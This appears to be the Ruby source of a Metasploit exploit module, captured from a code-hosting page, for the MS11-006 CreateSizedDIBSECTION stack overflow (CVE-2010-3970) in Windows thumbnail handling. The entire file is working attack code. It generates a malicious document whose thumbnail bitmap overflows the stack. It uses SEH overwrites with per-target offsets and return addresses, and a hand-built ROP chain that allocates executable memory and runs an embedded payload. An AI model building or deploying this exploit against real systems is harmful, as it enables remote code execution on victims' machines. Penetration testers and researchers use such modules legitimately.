318 lines
No EOL
7.8 KiB
Ruby
Executable file
318 lines
No EOL
7.8 KiB
Ruby
Executable file
##
|
|
# $Id: ms11_006_createsizeddibsection.rb 11730 2011-02-08 23:31:44Z jduck $
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GreatRanking
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
include Msf::Exploit::Seh
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack-based buffer overflow in the handling of thumbnails
|
|
within .MIC files and various Office documents. When processing a thumbnail bitmap
|
|
containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This
|
|
leads to arbitrary code execution.
|
|
|
|
In order to trigger the vulnerable code, the folder containing the document must be
|
|
viewed using the "Thumbnails" view.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Moti & Xu Hao', # original discovery
|
|
'Yaniv Miron aka Lament of ilhack',
|
|
'jduck' # Metasploit module
|
|
],
|
|
'Version' => '$Revision: 11730 $',
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2010-3970' ],
|
|
[ 'OSVDB', '70263' ],
|
|
[ 'MSB', 'MS11-006' ],
|
|
[ 'BID', '45662' ],
|
|
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2490606.mspx' ],
|
|
[ 'URL', 'http://www.powerofcommunity.net/schedule.html' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'seh',
|
|
'InitialAutoRunScript' => 'migrate -f'
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 512,
|
|
'BadChars' => "\x00",
|
|
'DisableNops' => true # no need
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
# This automatic target will combine all targets into one file :)
|
|
[ 'Automatic', { } ],
|
|
|
|
# Windows 2000 is a soft target... You're not still using it are you?
|
|
[ 'Windows 2000 SP0/SP4 English',
|
|
{
|
|
'Offset' => 1548, # Offset to SEH frame
|
|
'Ret' => 0x75022ac4 # p/p/r ws2help.dll v5.0.2134.1
|
|
}
|
|
],
|
|
|
|
# My test machine didn't have l3codeca.acm loaded (as mentioned in their slides)
|
|
# However, it did have msacm32.drv
|
|
[ 'Windows XP SP3 English',
|
|
{
|
|
'Offset' => 1560, # Offset to SEH frame
|
|
# Address from msacm32.drv v5.1.2600.0
|
|
'Ret' => 0x72d11676, # push esi / mov esi,[esp+0xc] / push [esi+0x54] / call [esi+0x5c]
|
|
|
|
# This ends up becoming eip due to above SafeSEH bypass
|
|
'PivotOffset' => 1652,
|
|
'RopStart' => 592
|
|
}
|
|
],
|
|
|
|
=begin
|
|
[ 'Windows Server 2003 SP2',
|
|
{
|
|
'Offset' => 1576, # Offset to SEH frame
|
|
'Ret' => 0xfeedfed5
|
|
|
|
# rop is possible with l3codeca.acm, but its not clear how to force it to be loaded.
|
|
# Also, it changed in Feburary 2010 ...
|
|
}
|
|
],
|
|
=end
|
|
|
|
# crash on a deref path to heaven.
|
|
[ 'Crash Target for Debugging',
|
|
{
|
|
'Offset' => 1337,
|
|
'Ret' => 0xdac0ffee
|
|
}
|
|
]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Dec 15 2010'))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
|
|
], self.class)
|
|
end
|
|
|
|
def exploit
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
|
|
|
out = ::File.expand_path(::File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
|
|
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
|
|
if (not stg)
|
|
raise RuntimeError, 'Unable to create output file'
|
|
end
|
|
|
|
stm = stg.create_stream("\x05SummaryInformation")
|
|
if (not stm)
|
|
raise RuntimeError, 'Unable to create SummaryInformation stream'
|
|
end
|
|
stm << generate_summaryinfo()
|
|
stm.close
|
|
|
|
stg.close
|
|
|
|
print_status("Generated output file #{out}")
|
|
|
|
end
|
|
|
|
def generate_summaryinfo
|
|
si = Rex::OLE::PropertySetStream.new
|
|
|
|
ps = Rex::OLE::PropertySet.new(Rex::OLE::FMTID_SummaryInformation)
|
|
|
|
bihdr = [
|
|
0x08, # ??
|
|
0x28, # biSize (struct size)
|
|
0x50, # biWidth
|
|
0x58, # biHeight
|
|
0x01, # biPlanes
|
|
0x08, # biBitCount
|
|
0x00, # biCompression
|
|
0xa8c0, # biSizeImage
|
|
0x00, # biXPelsPerMeter
|
|
0x00, # biYPelsPerMeter
|
|
# biClrUsed
|
|
0x80000001,
|
|
0x00 # biClrImportant
|
|
].pack('VVVVvvVVVVVV')
|
|
|
|
# ClipboardData
|
|
data = rand_text(8192)
|
|
data[0, bihdr.length] = bihdr
|
|
data[48, payload.encoded.length] = payload.encoded
|
|
|
|
if target.name == "Automatic"
|
|
targets.each { |t|
|
|
next if t.name !~ /Windows/i
|
|
|
|
add_target(data, t)
|
|
}
|
|
else
|
|
add_target(data, target)
|
|
end
|
|
|
|
prop = Rex::OLE::Property.new(Rex::OLE::PIDSI_THUMBNAIL, Rex::OLE::VT_CF, data)
|
|
ps << prop
|
|
si << ps
|
|
|
|
si.pack
|
|
end
|
|
|
|
def add_target(data, targ)
|
|
if targ['PivotOffset'] and targ['RopStart']
|
|
data[targ['Offset'] + 4, 4] = [targ.ret].pack('V')
|
|
|
|
rvas = rvas_explorer_xpsp3()
|
|
rop = generate_rop(rvas)
|
|
|
|
pivot = rva2addr(rvas, 'add ebp, [edx+6] / pop eax / leave / ret 4')
|
|
data[targ['PivotOffset'], 4] = [pivot].pack('V')
|
|
|
|
data[targ['RopStart'], rop.length] = rop
|
|
else
|
|
seh = generate_seh_record(targ.ret)
|
|
distance = targ['Offset'] + seh.length
|
|
distance -= 48 # the entire source buffer isn't copied
|
|
seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
|
|
|
|
data[targ['Offset'], seh.length] = seh
|
|
end
|
|
end
|
|
|
|
def rvas_explorer_xpsp3()
|
|
# explorer.exe version v6.0.2900.5512
|
|
# Just return this hash
|
|
{
|
|
'add ebp, [edx+6] / pop eax / leave / ret 4' => 0x2be9c,
|
|
'ret' => 0x3ebd,
|
|
|
|
'int3 / ... / ret' => 0x1922f,
|
|
|
|
'mov eax, esi / pop edi / pop esi / ret' => 0x2648,
|
|
'pop ebp / ret' => 0x3ebc,
|
|
'add eax, ebp / ret' => 0x13124,
|
|
'mov eax, [eax] / ret' => 0x74b7,
|
|
|
|
'pop ebx / ret' => 0x4bd5,
|
|
'push eax / call ebx' => 0xedc7,
|
|
'pop edi / pop esi / ret' => 0x23bb,
|
|
|
|
'pop ecx / ret' => 0x1acd9,
|
|
'call [ecx] / pop ebp / ret 0x10' => 0x2ad52,
|
|
|
|
'pop edi / ret' => 0x319bc,
|
|
|
|
'lea edi, [eax+0x1c] / rep movsd / pop edi / pop esi / ret' => 0x88c4,
|
|
|
|
'mov [eax], ecx / pop ebp / ret 4' => 0xa747,
|
|
'jmp eax' => 0x2080
|
|
}
|
|
end
|
|
|
|
def generate_rop(rvas)
|
|
# ROP fun! (XP SP3 English, Dec 29 2010)
|
|
rvas.merge!({
|
|
# Instructions / Name => RVA
|
|
'BaseAddress' => 0x01000000,
|
|
'imp_VirtualAlloc' => 0x11e8,
|
|
'Scratch' => 0x46060
|
|
})
|
|
|
|
rop_stack = [
|
|
'ret',
|
|
:unused, # from pivot
|
|
|
|
# First, get the address of our source buffer in relation to the
|
|
# SEH record pointer now saved in ESI
|
|
'mov eax, esi / pop edi / pop esi / ret',
|
|
:unused,
|
|
:unused,
|
|
|
|
'pop ebp / ret',
|
|
0xfffffa18,
|
|
'add eax, ebp / ret',
|
|
|
|
'pop ebx / ret',
|
|
'pop edi / pop esi / ret',
|
|
'push eax / call ebx',
|
|
|
|
# Allocate an RWX memory segment
|
|
'pop ecx / ret',
|
|
'imp_VirtualAlloc',
|
|
|
|
'call [ecx] / pop ebp / ret 0x10',
|
|
0, # lpAddress
|
|
0x1000, # dwSize
|
|
0x3000, # flAllocationType
|
|
0x40, # flProt
|
|
:unused,
|
|
|
|
# Copy the original payload
|
|
'pop ecx / ret',
|
|
:unused,
|
|
:unused,
|
|
:unused,
|
|
:unused,
|
|
0x80, # dwords to copy
|
|
|
|
'lea edi, [eax+0x1c] / rep movsd / pop edi / pop esi / ret',
|
|
:unused,
|
|
:unused,
|
|
|
|
# Add a jump over the space/crap
|
|
'pop ecx / ret',
|
|
0x90901aeb,
|
|
|
|
'mov [eax], ecx / pop ebp / ret 4',
|
|
:unused,
|
|
|
|
'jmp eax'
|
|
]
|
|
|
|
rop_stack.map! { |e|
|
|
if e.kind_of? String
|
|
# Meta-replace (RVA)
|
|
raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
|
|
rvas['BaseAddress'] + rvas[e]
|
|
|
|
elsif e == :unused
|
|
# Randomize
|
|
rand_text(4).unpack('V').first
|
|
|
|
else
|
|
# Literal
|
|
e
|
|
end
|
|
}
|
|
|
|
rop_stack.pack('V*')
|
|
end
|
|
|
|
def rva2addr(rvas, key)
|
|
raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
|
|
rvas['BaseAddress'] + rvas[key]
|
|
end
|
|
|
|
end |